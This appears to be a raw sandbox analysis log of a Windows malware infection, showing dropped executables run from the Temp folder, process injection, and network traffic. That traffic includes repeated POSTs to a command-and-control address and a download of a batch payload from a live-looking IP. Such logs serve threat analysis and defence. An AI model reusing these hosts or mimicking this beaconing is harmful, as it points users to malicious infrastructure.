                                                                                                        • C:\Users\Admin\AppData\Local\Temp\475D.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\475D.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:3908
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4CBD.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\4CBD.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:4448
                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                            2⤵
                                                                                                              PID:5580
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5009.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\5009.exe
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:2140
                                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:5368
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\5308.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\5308.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5564
                                                                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:5716
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\5A1E.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\5A1E.exe
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:6004
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3620
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3428

                                                                                                              Network

                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                72.32.126.40.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                72.32.126.40.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                8.8.8.8.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                8.8.8.8.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                                8.8.8.8.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                dnsgoogle
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                126.22.238.8.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                126.22.238.8.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                95.221.229.192.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                95.221.229.192.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                241.154.82.20.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                241.154.82.20.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                59.128.231.4.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                59.128.231.4.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                29.81.57.23.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                29.81.57.23.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                                29.81.57.23.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                a23-57-81-29deploystaticakamaitechnologiescom
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                26.35.223.20.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                26.35.223.20.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                23.159.190.20.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                23.159.190.20.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://wljpvt.net/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 183
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:25 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Content-Length: 8
                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://kprfwlesv.net/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 235
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:25 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Keep-Alive: timeout=5, max=99
                                                                                                                Connection: Keep-Alive
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://rsqdmple.net/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 297
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:25 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Content-Length: 403
                                                                                                                Keep-Alive: timeout=5, max=98
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://upruq.org/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 334
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:26 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Keep-Alive: timeout=5, max=97
                                                                                                                Connection: Keep-Alive
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://fchmtou.net/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 194
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:26 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Content-Length: 403
                                                                                                                Keep-Alive: timeout=5, max=96
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://ucplyyrdmy.com/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 158
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:26 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Content-Length: 41
                                                                                                                Keep-Alive: timeout=5, max=95
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://yrkbb.com/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 174
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:27 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Content-Length: 403
                                                                                                                Keep-Alive: timeout=5, max=94
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://oslfxv.net/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 151
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:27 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Keep-Alive: timeout=5, max=93
                                                                                                                Connection: Keep-Alive
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                29.68.91.77.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                29.68.91.77.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                                29.68.91.77.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                hosted-by yeezyhostnet
                                                                                                              • flag-fi
                                                                                                                GET
                                                                                                                http://77.91.68.52/fuza/3.bat
                                                                                                                Remote address:
                                                                                                                77.91.68.52:80
                                                                                                                Request
                                                                                                                GET /fuza/3.bat HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Host: 77.91.68.52
                                                                                                                Response
                                                                                                                HTTP/1.1 200 OK
                                                                                                                Date: Thu, 12 Oct 2023 20:47:26 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Last-Modified: Wed, 11 Oct 2023 23:08:44 GMT
                                                                                                                ETag: "4f-60778e7a46265"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 79
                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-msdos-program
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                52.68.91.77.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                52.68.91.77.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                                52.68.91.77.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                hosted-by yeezyhostnet
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://suqweuawhv.org/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 180
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:36 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Content-Length: 403
                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://etraykeh.net/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 335
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:36 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Keep-Alive: timeout=5, max=99
                                                                                                                Connection: Keep-Alive
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://qeviucsqwr.net/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 155
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:37 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Content-Length: 403
                                                                                                                Keep-Alive: timeout=5, max=98
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://irdjuuce.org/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 307
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:37 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Keep-Alive: timeout=5, max=97
                                                                                                                Connection: Keep-Alive
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://sqhsyyqj.org/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 284
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:38 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Content-Length: 403
                                                                                                                Keep-Alive: timeout=5, max=96
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://horyqhoxyy.com/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 233
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:38 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Content-Length: 40
                                                                                                                Keep-Alive: timeout=5, max=95
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://vuqcojeaix.net/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 126
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:39 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Content-Length: 403
                                                                                                                Keep-Alive: timeout=5, max=94
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://rjmjx.net/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 293
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:39 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Content-Length: 45
                                                                                                                Keep-Alive: timeout=5, max=93
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://kreewknq.com/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 141
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:44 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Content-Length: 403
                                                                                                                Keep-Alive: timeout=5, max=92
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://rvobbmqqdb.com/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 115
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:44 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Keep-Alive: timeout=5, max=91
                                                                                                                Connection: Keep-Alive
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://fyyoren.com/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 213
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:44 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Content-Length: 403
                                                                                                                Keep-Alive: timeout=5, max=90
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://wxdfxkwrs.net/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 114
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:44 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Content-Length: 38
                                                                                                                Keep-Alive: timeout=5, max=89
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://ilojxguy.org/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 329
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:45 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Content-Length: 403
                                                                                                                Keep-Alive: timeout=5, max=88
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://lplmsy.net/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 328
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:46 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Keep-Alive: timeout=5, max=87
                                                                                                                Connection: Keep-Alive
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://jggeeicy.com/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 173
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:46 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Content-Length: 403
                                                                                                                Keep-Alive: timeout=5, max=86
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://dolvw.net/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 141
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
                                                                                                                Date: Thu, 12 Oct 2023 20:47:47 GMT
                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                Keep-Alive: timeout=5, max=85
                                                                                                                Connection: Keep-Alive
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                              • flag-fi
                                                                                                                POST
                                                                                                                http://77.91.68.29/fks/
                                                                                                                Remote address:
                                                                                                                77.91.68.29:80
                                                                                                                Request
                                                                                                                POST /fks/ HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Accept: */*
                                                                                                                Referer: http://eubhv.net/
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Content-Length: 236
                                                                                                                Host: 77.91.68.29
                                                                                                                Response
                                                                                                                HTTP/1.1 404 Not Found
